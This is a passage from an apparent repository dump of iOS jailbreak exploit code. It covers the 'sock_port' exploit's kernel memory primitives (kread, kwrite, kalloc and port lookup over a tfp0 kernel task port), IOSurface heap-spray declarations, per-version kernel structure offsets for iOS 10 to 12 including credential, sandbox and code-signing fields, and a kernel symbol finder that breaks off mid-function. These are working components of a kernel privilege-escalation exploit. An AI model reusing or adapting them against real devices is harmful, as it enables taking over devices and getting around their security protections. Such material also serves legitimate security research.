IOSurface_spray_remove_array(uint32_t array_id);\n\n/*\n * IOSurface_spray_clear\n *\n * Description:\n * \tRemove all the arrays from an IOSurface spray, freeing all the data elements.\n */\nbool IOSurface_spray_clear(uint32_t array_count);\n\n// ---- IOSurface types ---------------------------------------------------------------------------\n\nstruct _IOSurfaceFastCreateArgs {\n    uint64_t address;\n    uint32_t width;\n    uint32_t 
height;\n    uint32_t pixel_format;\n    uint32_t bytes_per_element;\n    uint32_t bytes_per_row;\n    uint32_t alloc_size;\n};\n\nstruct IOSurfaceLockResult {\n    uint64_t addr1;\n    uint64_t addr2;\n    uint64_t addr3;\n    uint32_t surface_id;\n    uint8_t _pad2[0xdd0-0x18-0x4];\n};\n\nstruct IOSurfaceValueArgs {\n    uint32_t surface_id;\n    uint32_t _out1;\n    union {\n        uint32_t xml[0];\n        char string[0];\n    };\n};\n\nstruct IOSurfaceValueArgs_string {\n    uint32_t surface_id;\n    uint32_t _out1;\n    uint32_t string_data;\n    char null;\n};\n\nstruct IOSurfaceValueResultArgs {\n    uint32_t out;\n};\n\n\nbool IOSurface_set_value(const struct IOSurfaceValueArgs *args, size_t args_size);\n\n#undef extern\n\n#endif\n"
  },
  {
    "path": "Exploits/sock_port/kernel_memory.c",
    "content": "//\n//  kernel_memory.c\n//  sock_port\n//\n//  Created by Jake James on 7/18/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#include \"kernel_memory.h\"\n\nstatic mach_port_t tfpzero;\n\nvoid init_kernel_memory(mach_port_t tfp0) {\n    tfpzero = tfp0;\n}\n\nuint64_t kalloc(vm_size_t size) {\n    mach_vm_address_t address = 0;\n    mach_vm_allocate(tfpzero, (mach_vm_address_t *)&address, size, VM_FLAGS_ANYWHERE);\n    return address;\n}\n\nvoid kfree(mach_vm_address_t address, vm_size_t size) {\n    mach_vm_deallocate(tfpzero, address, size);\n}\n\nsize_t kread(uint64_t where, void *p, size_t size) {\n    int rv;\n    size_t offset = 0;\n    while (offset < size) {\n        mach_vm_size_t sz, chunk = 2048;\n        if (chunk > size - offset) {\n            chunk = size - offset;\n        }\n        rv = mach_vm_read_overwrite(tfpzero, where + offset, chunk, (mach_vm_address_t)p + offset, &sz);\n        if (rv || sz == 0) {\n            printf(\"Kernel Memory: error on kread(0x%016llx)\\n\", where);\n            break;\n        }\n        offset += sz;\n    }\n    return offset;\n}\n\nuint32_t rk32(uint64_t where) {\n    uint32_t out;\n    kread(where, &out, sizeof(uint32_t));\n    return out;\n}\n\nuint64_t rk64(uint64_t where) {\n    uint64_t out;\n    kread(where, &out, sizeof(uint64_t));\n    return out;\n}\n\nsize_t kwrite(uint64_t where, const void *p, size_t size) {\n    int rv;\n    size_t offset = 0;\n    while (offset < size) {\n        size_t chunk = 2048;\n        if (chunk > size - offset) {\n            chunk = size - offset;\n        }\n        rv = mach_vm_write(tfpzero, where + offset, (mach_vm_offset_t)p + offset, (int)chunk);\n        if (rv) {\n            printf(\"Kernel Memory: error on kwrite(0x%016llx)\\n\", where);\n            break;\n        }\n        offset += chunk;\n    }\n    return offset;\n}\n\nvoid wk32(uint64_t where, uint32_t what) {\n    uint32_t _what = what;\n    kwrite(where, &_what, 
sizeof(uint32_t));\n}\n\n\nvoid wk64(uint64_t where, uint64_t what) {\n    uint64_t _what = what;\n    kwrite(where, &_what, sizeof(uint64_t));\n}\n\nuint64_t find_port(mach_port_name_t port, uint64_t task_self) {\n    uint64_t task_addr = rk64(task_self + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));\n    uint64_t itk_space = rk64(task_addr + koffset(KSTRUCT_OFFSET_TASK_ITK_SPACE));\n    uint64_t is_table = rk64(itk_space + koffset(KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE));\n    \n    uint32_t port_index = port >> 8;\n    const int sizeof_ipc_entry_t = 0x18;\n    \n    uint64_t port_addr = rk64(is_table + (port_index * sizeof_ipc_entry_t));\n    \n    return port_addr;\n}\n"
  },
  {
    "path": "Exploits/sock_port/kernel_memory.h",
    "content": "//\n//  kernel_memory.h\n//  sock_port\n//\n//  Created by Jake James on 7/18/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#ifndef kernel_memory_h\n#define kernel_memory_h\n\n#include <stdio.h>\n#include <mach/mach.h>\n#include \"offsets.h\"\n\nkern_return_t mach_vm_allocate(vm_map_t target, mach_vm_address_t *address, mach_vm_size_t size, int flags);\nkern_return_t mach_vm_read_overwrite(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, mach_vm_address_t data, mach_vm_size_t *outsize);\nkern_return_t mach_vm_write(vm_map_t target_task, mach_vm_address_t address, vm_offset_t data, mach_msg_type_number_t dataCnt);\nkern_return_t mach_vm_deallocate(vm_map_t target, mach_vm_address_t address, mach_vm_size_t size);;\nkern_return_t mach_vm_read(vm_map_t target_task, mach_vm_address_t address, mach_vm_size_t size, vm_offset_t *data, mach_msg_type_number_t *dataCnt);\n\nvoid init_kernel_memory(mach_port_t tfp0);\n\nsize_t kread(uint64_t where, void *p, size_t size);\nuint32_t rk32(uint64_t where);\nuint64_t rk64(uint64_t where);\n\nsize_t kwrite(uint64_t where, const void *p, size_t size);\nvoid wk32(uint64_t where, uint32_t what);\nvoid wk64(uint64_t where, uint64_t what);\n\nvoid kfree(mach_vm_address_t address, vm_size_t size);\nuint64_t kalloc(vm_size_t size);\n\nuint64_t find_port(mach_port_name_t port, uint64_t task_self);\n\n#endif /* kernel_memory_h */\n"
  },
  {
    "path": "Exploits/sock_port/offsetof.c",
    "content": "unsigned off_p_pid = 0x10;               // proc_t::p_pid\nunsigned off_task = 0x18;                // proc_t::task\nunsigned off_p_uid = 0x30;               // proc_t::p_uid\nunsigned off_p_gid = 0x34;               // proc_t::p_uid\nunsigned off_p_ruid = 0x38;              // proc_t::p_uid\nunsigned off_p_rgid = 0x3c;              // proc_t::p_uid\nunsigned off_p_ucred = 0x100;            // proc_t::p_ucred\nunsigned off_p_fd = 0x108;               // proc_t::p_fd\nunsigned off_p_csflags = 0x2a8;          // proc_t::p_csflags\nunsigned off_p_comm = 0x268;             // proc_t::p_comm\nunsigned off_p_textvp = 0x248;           // proc_t::p_textvp\nunsigned off_p_textoff = 0x250;          // proc_t::p_textoff\nunsigned off_p_cputype = 0x2c0;          // proc_t::p_cputype\nunsigned off_p_cpu_subtype = 0x2c4;      // proc_t::p_cpu_subtype\n\nunsigned off_itk_self = 0xD8;            // task_t::itk_self (convert_task_to_port)\nunsigned off_itk_sself = 0xE8;           // task_t::itk_sself (task_get_special_port)\nunsigned off_itk_bootstrap = 0x2b8;      // task_t::itk_bootstrap (task_get_special_port)\nunsigned off_itk_space = 0x308;          // task_t::itk_space\n\nunsigned off_ip_mscount = 0x9C;          // ipc_port_t::ip_mscount (ipc_port_make_send)\nunsigned off_ip_srights = 0xA0;          // ipc_port_t::ip_srights (ipc_port_make_send)\nunsigned off_ip_kobject = 0x68;          // ipc_port_t::ip_kobject\n\nunsigned off_special = 2 * sizeof(long); // host::special\nunsigned off_ipc_space_is_table = 0x20;  // ipc_space::is_table?..\n\nunsigned off_ucred_cr_uid = 0x18;        // ucred::cr_uid\nunsigned off_ucred_cr_ruid = 0x1c;       // ucred::cr_ruid\nunsigned off_ucred_cr_svuid = 0x20;      // ucred::cr_svuid\nunsigned off_ucred_cr_ngroups = 0x24;    // ucred::cr_ngroups\nunsigned off_ucred_cr_groups = 0x28;     // ucred::cr_groups\nunsigned off_ucred_cr_rgid = 0x68;       // ucred::cr_rgid\nunsigned off_ucred_cr_svgid = 0x6c;      // 
ucred::cr_svgid\nunsigned off_ucred_cr_label = 0x78;      // ucred::cr_label\n\nunsigned off_amfi_slot = 0x8;\nunsigned off_sandbox_slot = 0x10;\n\nunsigned off_v_type = 0x70;              // vnode::v_type\nunsigned off_v_id = 0x74;                // vnode::v_id\nunsigned off_v_ubcinfo = 0x78;           // vnode::v_ubcinfo\nunsigned off_v_flags = 0x54;             // vnode::v_flags\n\nunsigned off_ubcinfo_csblobs = 0x50;     // ubc_info::csblobs\n\nunsigned off_csb_cputype = 0x8;          // cs_blob::csb_cputype\nunsigned off_csb_flags = 0x12;           // cs_blob::csb_flags\nunsigned off_csb_base_offset = 0x16;     // cs_blob::csb_base_offset\nunsigned off_csb_entitlements_offset = 0x90; // cs_blob::csb_entitlements\nunsigned off_csb_signer_type = 0xA0;     // cs_blob::csb_signer_type\nunsigned off_csb_platform_binary = 0xA4; // cs_blob::csb_platform_binary\nunsigned off_csb_platform_path = 0xA8;   // cs_blob::csb_platform_path\nunsigned off_csb_cd = 0x80;              // cs_blob::csb_cd\nunsigned off_si_flags = 0x10;\nunsigned off_t_flags = 0x3a0; // task::t_flags\n\nunsigned off_v_mount = 0xd8;             // vnode::v_mount\nunsigned off_v_specinfo = 0x78;          // vnode::v_specinfo\nunsigned off_specflags = 0x10;\nunsigned off_mnt_flag = 0x70;            // mount::mnt_flag\nunsigned off_mnt_data = 0x8f8;           // mount::mnt_data\n\nunsigned off_getExternelTrapForIndex = 0xb7; // IOUserClient::getExternalTrapForIndex\n"
  },
  {
    "path": "Exploits/sock_port/offsetof.h",
    "content": "\nextern unsigned off_p_pid;\nextern unsigned off_task;\nextern unsigned off_p_uid;\nextern unsigned off_p_gid;\nextern unsigned off_p_ruid;\nextern unsigned off_p_rgid;\nextern unsigned off_p_ucred;\nextern unsigned off_p_fd;\nextern unsigned off_p_csflags;\nextern unsigned off_p_comm;\n\nextern unsigned off_itk_self;\nextern unsigned off_itk_sself;\nextern unsigned off_itk_bootstrap;\nextern unsigned off_itk_space;\nextern unsigned off_ip_mscount;\nextern unsigned off_ip_srights;\nextern unsigned off_ip_kobject;\nextern unsigned off_p_textvp;\nextern unsigned off_p_textoff;\nextern unsigned off_p_cputype;\nextern unsigned off_p_cpu_subtype;\nextern unsigned off_special;\nextern unsigned off_ipc_space_is_table;\nextern unsigned off_si_flags;\nextern unsigned off_ucred_cr_uid;\nextern unsigned off_ucred_cr_ruid;\nextern unsigned off_ucred_cr_gid;\nextern unsigned off_ucred_cr_rgid;\nextern unsigned off_ucred_cr_svgid;\nextern unsigned off_ucred_cr_groups;\nextern unsigned off_ucred_cr_ngroups;\nextern unsigned off_ucred_cr_svuid;\nextern unsigned off_ucred_cr_label;\n\nextern unsigned off_amfi_slot;\nextern unsigned off_sandbox_slot;\n\nextern unsigned off_v_type;\nextern unsigned off_v_id;\nextern unsigned off_v_ubcinfo;\nextern unsigned off_v_flags;\n\nextern unsigned off_ubcinfo_csblobs;\n\nextern unsigned off_csb_cputype;\nextern unsigned off_csb_flags;\nextern unsigned off_csb_base_offset;\nextern unsigned off_csb_entitlements_offset;\nextern unsigned off_csb_signer_type;\nextern unsigned off_csb_platform_binary;\nextern unsigned off_csb_platform_path;\nextern unsigned off_csb_cd;\n\nextern unsigned off_t_flags;\n\nextern unsigned off_v_mount;\nextern unsigned off_v_specinfo;\nextern unsigned off_specflags;\nextern unsigned off_mnt_flag;\nextern unsigned off_mnt_data;\n\nextern unsigned off_getExternelTrapForIndex;\n\n#define\tCS_VALID\t\t0x0000001\t/* dynamically valid */\n#define CS_ADHOC\t\t0x0000002\t/* ad hoc signed */\n#define 
CS_GET_TASK_ALLOW\t0x0000004\t/* has get-task-allow entitlement */\n#define CS_INSTALLER\t\t0x0000008\t/* has installer entitlement */\n\n#define\tCS_HARD\t\t\t0x0000100\t/* don't load invalid pages */\n#define\tCS_KILL\t\t\t0x0000200\t/* kill process if it becomes invalid */\n#define CS_CHECK_EXPIRATION\t0x0000400\t/* force expiration checking */\n#define CS_RESTRICT\t\t0x0000800\t/* tell dyld to treat restricted */\n#define CS_ENFORCEMENT\t\t0x0001000\t/* require enforcement */\n#define CS_REQUIRE_LV\t\t0x0002000\t/* require library validation */\n#define CS_ENTITLEMENTS_VALIDATED\t0x0004000\n\n#define\tCS_ALLOWED_MACHO\t0x00ffffe\n\n#define CS_EXEC_SET_HARD\t0x0100000\t/* set CS_HARD on any exec'ed process */\n#define CS_EXEC_SET_KILL\t0x0200000\t/* set CS_KILL on any exec'ed process */\n#define CS_EXEC_SET_ENFORCEMENT\t0x0400000\t/* set CS_ENFORCEMENT on any exec'ed process */\n#define CS_EXEC_SET_INSTALLER\t0x0800000\t/* set CS_INSTALLER on any exec'ed process */\n\n#define CS_KILLED\t\t0x1000000\t/* was killed by kernel for invalidity */\n#define CS_DYLD_PLATFORM\t0x2000000\t/* dyld used to load this is a platform binary */\n#define CS_PLATFORM_BINARY\t0x4000000\t/* this is a platform binary */\n#define CS_PLATFORM_PATH\t0x8000000\t/* platform binary by the fact of path (osx only) */\n\n#define CS_DEBUGGED         0x10000000  /* process is currently or has previously been debugged and allowed to run with invalid pages */\n#define CS_SIGNED         0x20000000  /* process has a signature (may have gone invalid) */\n#define CS_DEV_CODE         0x40000000  /* code is dev signed, cannot be loaded into prod signed code (will go away with rdar://problem/28322552) */\n\n"
  },
  {
    "path": "Exploits/sock_port/offsets.h",
    "content": "#ifndef offsets_h\n#define offsets_h\n\nenum kstruct_offset {\n    /* struct task */\n    KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n    KSTRUCT_OFFSET_TASK_REF_COUNT,\n    KSTRUCT_OFFSET_TASK_ACTIVE,\n    KSTRUCT_OFFSET_TASK_VM_MAP,\n    KSTRUCT_OFFSET_TASK_NEXT,\n    KSTRUCT_OFFSET_TASK_PREV,\n    KSTRUCT_OFFSET_TASK_ITK_SELF,\n    KSTRUCT_OFFSET_TASK_ITK_SPACE,\n    KSTRUCT_OFFSET_TASK_BSD_INFO,\n    \n    /* struct ipc_port */\n    KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n    KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n    KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n    KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n    KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n    KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n    KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n    KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n    KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n    \n    /* struct proc */\n    KSTRUCT_OFFSET_PROC_PID,\n    KSTRUCT_OFFSET_PROC_P_FD,\n    \n    /* struct filedesc */\n    KSTRUCT_OFFSET_FILEDESC_FD_OFILES,\n    \n    /* struct fileproc */\n    KSTRUCT_OFFSET_FILEPROC_F_FGLOB,\n    \n    /* struct fileglob */\n    KSTRUCT_OFFSET_FILEGLOB_FG_DATA,\n    \n    /* struct socket */\n    KSTRUCT_OFFSET_SOCKET_SO_PCB,\n    \n    /* struct pipe */\n    KSTRUCT_OFFSET_PIPE_BUFFER,\n    \n    /* struct ipc_space */\n    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE,\n    KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE,\n    \n    KFREE_ADDR_OFFSET,\n};\n\nint koffset(enum kstruct_offset offset);\nvoid offsets_init(void);\n\nextern uint32_t create_outsize;\n#endif \n"
  },
  {
    "path": "Exploits/sock_port/offsets.m",
    "content": "#import <Foundation/Foundation.h>\n#import <UIKit/UIKit.h>\n\n#import <stdio.h>\n#import <stdlib.h>\n#import <string.h>\n#import <sys/sysctl.h>\n#import <sys/utsname.h>\n\n#import \"offsets.h\"\n\n#define SYSTEM_VERSION_EQUAL_TO(v)                  ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedSame)\n#define SYSTEM_VERSION_GREATER_THAN(v)              ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedDescending)\n#define SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(v)  ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN(v)                 ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] == NSOrderedAscending)\n#define SYSTEM_VERSION_LESS_THAN_OR_EQUAL_TO(v)     ([[[UIDevice currentDevice] systemVersion] compare:v options:NSNumericSearch] != NSOrderedDescending)\n\nint* offsets = NULL;\n// proc_t\nint kstruct_offsets_10_x[] = {\n    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,\n    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,\n    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,\n    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,\n    0x30,  // KSTRUCT_OFFSET_TASK_PREV,\n    0xd8,  // KSTRUCT_OFFSET_TASK_ITK_SELF,\n    0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n    0x360, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n    \n    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n    0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n    \n    0x10,  // KSTRUCT_OFFSET_PROC_PID,\n    0x108, // KSTRUCT_OFFSET_PROC_P_FD\n    
\n    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n    \n    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n    \n    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n    \n    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB\n    \n    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER\n    \n    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n    \n    0x6c,  // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_11_0[] = {\n    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,\n    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,\n    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,\n    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,\n    0x30,  // KSTRUCT_OFFSET_TASK_PREV,\n    0xd8,  // KSTRUCT_OFFSET_TASK_ITK_SELF,\n    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n    \n    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n    0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n    \n    0x10,  // KSTRUCT_OFFSET_PROC_PID,\n    0x108, // KSTRUCT_OFFSET_PROC_P_FD\n    \n    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n    \n    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n    \n    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n    \n    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB\n    \n    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER\n    \n    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n    \n    0x6c,  // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_11_3[] = {\n    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,\n    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,\n    0x20,  // 
KSTRUCT_OFFSET_TASK_VM_MAP,\n    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,\n    0x30,  // KSTRUCT_OFFSET_TASK_PREV,\n    0xd8,  // KSTRUCT_OFFSET_TASK_ITK_SELF,\n    0x308, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n    0x368, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n    \n    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n    0x88,  // KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n    \n    0x10,  // KSTRUCT_OFFSET_PROC_PID,\n    0x108, // KSTRUCT_OFFSET_PROC_P_FD\n    \n    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n    \n    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n    \n    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n    \n    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB\n    \n    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER\n    \n    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n    \n    0x7c,  // KFREE_ADDR_OFFSET\n};\n\nint kstruct_offsets_12_0[] = {\n    0xb,   // KSTRUCT_OFFSET_TASK_LCK_MTX_TYPE,\n    0x10,  // KSTRUCT_OFFSET_TASK_REF_COUNT,\n    0x14,  // KSTRUCT_OFFSET_TASK_ACTIVE,\n    0x20,  // KSTRUCT_OFFSET_TASK_VM_MAP,\n    0x28,  // KSTRUCT_OFFSET_TASK_NEXT,\n    0x30,  // KSTRUCT_OFFSET_TASK_PREV,\n    0xd8,  // KSTRUCT_OFFSET_TASK_ITK_SELF,\n    0x300, // KSTRUCT_OFFSET_TASK_ITK_SPACE,\n    0x358, // KSTRUCT_OFFSET_TASK_BSD_INFO,\n    \n    0x0,   // KSTRUCT_OFFSET_IPC_PORT_IO_BITS,\n    0x4,   // KSTRUCT_OFFSET_IPC_PORT_IO_REFERENCES,\n    0x40,  // KSTRUCT_OFFSET_IPC_PORT_IKMQ_BASE,\n    0x50,  // KSTRUCT_OFFSET_IPC_PORT_MSG_COUNT,\n    0x60,  // KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER,\n    0x68,  // KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT,\n    0x88,  // 
KSTRUCT_OFFSET_IPC_PORT_IP_PREMSG,\n    0x90,  // KSTRUCT_OFFSET_IPC_PORT_IP_CONTEXT,\n    0xa0,  // KSTRUCT_OFFSET_IPC_PORT_IP_SRIGHTS,\n    \n    0x60,  // KSTRUCT_OFFSET_PROC_PID,\n    0x100, // KSTRUCT_OFFSET_PROC_P_FD\n    \n    0x0,   // KSTRUCT_OFFSET_FILEDESC_FD_OFILES\n    \n    0x8,   // KSTRUCT_OFFSET_FILEPROC_F_FGLOB\n    \n    0x38,  // KSTRUCT_OFFSET_FILEGLOB_FG_DATA\n    \n    0x10,  // KSTRUCT_OFFSET_SOCKET_SO_PCB\n    \n    0x10,  // KSTRUCT_OFFSET_PIPE_BUFFER\n    \n    0x14,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE_SIZE\n    0x20,  // KSTRUCT_OFFSET_IPC_SPACE_IS_TABLE\n    \n    0x7c,  // KFREE_ADDR_OFFSET\n};\n\nint koffset(enum kstruct_offset offset) {\n    if (offsets == NULL) {\n        printf(\"Need to call offsets_init() prior to querying offsets\\n\");\n        return 0;\n    }\n    return offsets[offset];\n}\n\nuint32_t create_outsize;\n\nvoid offsets_init() {\n    if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"12.0\")) {\n        printf(\"The offsets for iOS 12.0 or above are in use. \\n\");\n        offsets = kstruct_offsets_12_0;\n        \n#if __arm64e__\n        offsets[8] = 0x368;\n#endif\n        create_outsize = 0xdd0;\n    }\n    \n    else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.3\")) {\n        printf(\"The offsets for iOS 12.0 or above are in use. \\n\");\n        offsets = kstruct_offsets_11_3;\n        create_outsize = 0xbc8;\n    } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.1\")) {\n        printf(\"The offsets for iOS 11.3+ or above are in use. \\n\");\n        offsets = kstruct_offsets_11_3;\n        create_outsize = 0xbc8;\n    } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"11.0\")) {\n        printf(\"The offsets for iOS 11.0 or above are in use. 
\\n\");\n        offsets = kstruct_offsets_11_0;\n        create_outsize = 0x6c8;\n    } else if (SYSTEM_VERSION_GREATER_THAN_OR_EQUAL_TO(@\"10.0\")) {\n        printf(\"The offsets for iOS 10.0 or above are in use.\\n\");\n        offsets = kstruct_offsets_10_x;\n        create_outsize = 0x3c8;\n    } else {\n        printf(\"The iOS version is too low! At least iOS 10.0 is required! \\n\");\n        exit(EXIT_FAILURE);\n    }\n}\n"
  },
  {
    "path": "Kernel Utilities/kernSymbolication.c",
    "content": "//\n//  kernelSymbolFinder.c\n//  KernelSymbolFinder\n//\n//  Created by Jake James on 8/21/18.\n//  Copyright © 2018 Jake James. All rights reserved.\n//\n\n#include \"kernSymbolication.h\"\n#include \"../Kernel Utilities/lzssdec.hpp\"\n#define SWAP32(p) __builtin_bswap32(p)\n\nstatic FILE *file;\nuint32_t offset = 0;\n\nstatic void *load_bytes(FILE *obj_file, off_t offset, uint32_t size) {\n    void *buf = calloc(1, size);\n    fseek(obj_file, offset, SEEK_SET);\n    fread(buf, size, 1, obj_file);\n    return buf;\n}\n\nuint64_t find_symbol(const char *symbol, bool verbose) {\n    uint64_t addr = 0;\n    size_t offset = 0;\n    size_t sym_offset = 0;\n    int ncmds = 0;\n    struct load_command *cmd = NULL;\n    uint32_t *magic = load_bytes(file, offset, sizeof(uint32_t)); //at offset 0 we have the magic number\n    if (verbose) printf(\"SymbolFinder: MAGIC = 0x%x\\n\", *magic);\n    if (*magic == 0xFEEDFACF) {\n        if (verbose) printf(\"SymbolFinder: 64bit binary\\n\");\n        struct mach_header_64 *mh64 = load_bytes(file, offset, sizeof(struct mach_header_64));\n        ncmds = mh64->ncmds;\n        free(mh64);\n        offset += sizeof(struct mach_header_64);\n        if (verbose) printf(\"SymbolFinder: %d LOAD COMMANDS\\n\", ncmds);\n        for (int i = 0; i < ncmds; i++) {\n            cmd = load_bytes(file, offset, sizeof(struct load_command));\n            if (verbose) printf(\"SymbolFinder: LOAD COMMAND %d = 0x%x\\n\", i, cmd->cmd);\n            if (cmd->cmd == LC_SYMTAB) {\n                if (verbose) printf(\"SymbolFinder: Found LC_SYMTAB command!\\n\");\n                struct symtab_command *symtab = load_bytes(file, offset, cmd->cmdsize);\n                if (verbose) printf(\"\\t %d symbols\\n\", symtab->nsyms);\n                if (verbose) printf(\"\\t Symbol table at 0x%x\\n\", symtab->symoff);\n                for (int i = 0; i < symtab->nsyms; i++) {\n                    struct symbol *sym = load_bytes(file, 
symtab->symoff + sym_offset, sizeof(struct symbol));\n                    int symlen = 0;\n                    int sym_str_addr = sym->table_index + symtab->stroff;\n                    uint8_t *byte = load_bytes(file, sym_str_addr+symlen, 1);\n                    while (*byte != 0) {\n                        free(byte);\n                        symlen++;\n                        byte = load_bytes(file, sym_str_addr+symlen, 1);\n                    }\n                    free(byte);\n                    char *sym_name = load_bytes(file, sym_str_addr, symlen + 1);\n                    if (verbose) printf(\"\\t%s: 0x%llx\\n\", sym_name, sym->address);\n                    if (!strcmp(sym_name, symbol)) {\n                        addr = sym->address;\n                        if (!verbose) return addr;\n                    }\n                    free(sym_name);\n                    sym_offset += sizeof(struct symbol);\n                    free(sym);\n                }\n                free(symtab);\n                free(cmd);\n                break;\n            }\n            offset += cmd->cmdsize;\n            free(cmd);\n        }\n    }\n    else if (*magic == 0xFEEDFACE){\n        if (verbose) printf(\"SymbolFinder: Got 32bit binary\\n\");\n        struct mach_header *mh = load_bytes(file, offset, sizeof(struct mach_header));\n        ncmds = mh->ncmds;\n        free(mh);\n        offset += sizeof(struct mach_header);\n        if (verbose) printf(\"SymbolFinder: %d LOAD COMMANDS\\n\", ncmds);\n        for (int i = 0; i < ncmds; i++) {\n            cmd = load_bytes(file, offset, 